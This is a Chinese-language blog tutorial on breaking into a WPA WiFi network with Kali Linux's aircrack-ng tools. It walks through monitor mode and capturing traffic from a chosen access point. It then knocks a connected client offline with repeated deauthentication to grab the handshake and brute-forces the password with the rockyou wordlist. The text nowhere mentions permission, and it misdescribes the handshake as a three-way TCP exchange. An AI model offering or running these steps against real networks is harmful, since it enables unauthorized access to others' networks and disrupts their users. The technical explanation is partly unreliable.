使用kail做wifi渗透,网卡rtl8188eu(超详细)

前一篇文章讲了如何在虚拟机中安装kail

1.第一步将网卡挂载到虚拟机中:

按下图操作即可下图所示

然后打开终端输入:ifconfig,如下出现wlan0,表示挂载成功

 2.打开kail的无线攻击功能:

 

 

3.查看各接口的状态:

airmon-ng

如果你的网卡本身支持监听功能就好。

如果像我一样显卡的芯片是rtl8188eu本身不支持监听功能的,那么很可能你的PHY栏会显示null,那么后面想监听wifi是不可能的,解决方法只有重新编译驱动,请参考我这篇文章

4.检查影响aircrack-ng的进程

当我们将网卡置于monitor模式的时候,会自动地检查影响aircrack-ng的进程。也可以通过以下命令手动检查:

airmon-ng check

5.杀死影响aircrack-ng的进程

以下命令会停掉network managers然后杀死所有影响aircrack-ng的进程:

airmon-ng check kill

6.开启monitor模式

airmon-ng start wlan0

我的是上面这样,虽然名字没有改成wlan0mon但是也可以用,可能和我的网卡有关系,本身rtl8188eu就是不支持的。

如果网卡本身支持,正常情况下是这样,会出现wlan0mon或者mon

7.监听周边wifi:

airodump-ng wlan0  # 你的后面有mon就跟写上mon

 BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码

8.对你要破解的wifi进行抓包,以第一个wifi为例子

sudo airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/answer/aaa/a1/a1 wlan0

格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon

 

 

 9.通常只是第8步很难抓到包,所以需要对已连接的终端进行攻击,使它掉线重连,以此来获取数据包。

通过上面的图片和一看到,有三个正在连接的终端,选一个信号最强的也就是PWR是-76的,以此为例,重新打开一个终端输入如下:

aireplay-ng -0 2 -a BC:5F:6F:3D:03:74 -c B8:37:65:94:5D:13 wlan0

(0 WiFi设备无限次数,-0 2则攻击2次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,数据包里面的密码是哈希加密的,哈希加密只能正向)

10.当第8步中的终端出现WPA handshake时,表示抓包成功

 

 

两个终端都按Ctrl+c停止,不然那边会一直断网的

cd打开抓包的目录,ls列出来,就看到我们抓到的数据包

11.字典解密

解压kail中自带的字典,在/usr/share/wordlists/

 

 

 有很多,最大的是rockyou.txt.gz,解压后大约160m

解压命令:

gzip -d/usr/share/wordlists/rockyou.txt.gz

# 或者

# zcat rockyou.txt.gz > r.txt # 新建一个txt文件

最后,进行字典破解cap文件:

aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap

漫长只等待,在这个过程中,就不需要网卡了,只是离线破解,所以网卡可以该干嘛干嘛就行,重启network-manager命令是:service network-manager start 

posted @ 2020-03-13 19:02  AnswerThe  阅读(9341)  评论(0编辑  收藏  举报